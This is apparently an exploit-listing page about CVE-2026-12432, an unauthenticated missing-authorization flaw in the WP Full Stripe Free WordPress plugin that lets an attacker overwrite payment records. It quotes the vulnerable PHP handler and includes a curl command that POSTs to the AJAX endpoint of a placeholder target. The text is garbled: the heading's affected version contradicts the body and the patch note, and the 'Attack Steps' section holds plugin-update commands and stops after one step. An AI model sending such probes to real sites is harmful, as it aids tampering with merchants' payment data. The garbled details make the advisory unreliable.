Exploit for CVE-2026-12432

## https://sploitus.com/exploit?id=CED4BCD6-8E56-5FF9-A68C-174EFA9EBB61
# CVE-2026-12432: WP Full Stripe Free = 8.4.4
- **Published**: June 26, 2026
- **Last Updated**: June 27, 2026
- **Researcher**: Netwurm - VTDR e.V.i.G.

## Vulnerability Description

The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.

### Root Cause

The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:

```php
// wpfs-customer.php, Line 705-706
add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
```

The `update_failed_payment_status()` function (Line 3835-3865) performs:
- ❌ **NO capability check** (no `current_user_can()`)
- ❌ **NO nonce verification** (no `wp_verify_nonce()`)
- ❌ **NO logged-in check** (no `is_user_logged_in()`)

### Vulnerable Code

```php
// wpfs-customer.php, Line 3835-3865
function update_failed_payment_status() {
    try {
        $result = [];
        $failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
        $failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
        $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;

        $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
        // ... no auth check before processing ...

        $updateData = [
            'paid' => 0,
            'captured' => 0,
            'refunded' => 0
        ];

        // Attacker can overwrite with controlled values
        if ( $lastCharge ) {
            $updateData['last_charge_status'] = $lastCharge->status;
            $updateData['failure_code'] = $lastCharge->failure_code;
            $updateData['failure_message'] = $lastCharge->failure_message;
        } else {
            $updateData['last_charge_status'] = 'failed';
            $updateData['failure_code'] = $failureCode;
            $updateData['failure_message'] = $failureMessage;
        }

        $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
        // ...
    }
}
```

## Attack Vector

### Prerequisites
- Payment Intent ID must be known (exposed in browser during normal Stripe checkout)
- No authentication required

### Attack Steps

1. **Identify Target**: Find WordPress site with WP Full Stripe Free = 8.4.4**

```bash
# Via WordPress Admin
Dashboard > Plugins > WP Full Stripe > Update

# Via WP-CLI
wp plugin update wp-full-stripe-free

# Via SSH
wp plugin update wp-full-stripe-free --version=8.4.4
```

## Detection

### Manual Check

1. Check plugin version in WordPress admin
2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
3. Look for missing `current_user_can()` before AJAX handlers

### Automated Detection

```bash
# Check if vulnerable version is installed
curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"

# Test AJAX endpoint
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  -d "action=wpfs_update_failed_payment_status" \
  -d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
```

## References

- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
- [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
- [Patchstack Database](https://patchstack.com/database/)

## W.P.E.F
- [W.P.E.F Telegram chanel #1](https://t.me/wpef0)
- [W.P.E.F Telegram chanel #2](https://t.me/wpef01)
--

## Timeline

- **June 26, 2026**: Vulnerability publicly disclosed
- **June 27, 2026**: CVE-2026-12432 published
- **Patch**: Update to >= 8.4.4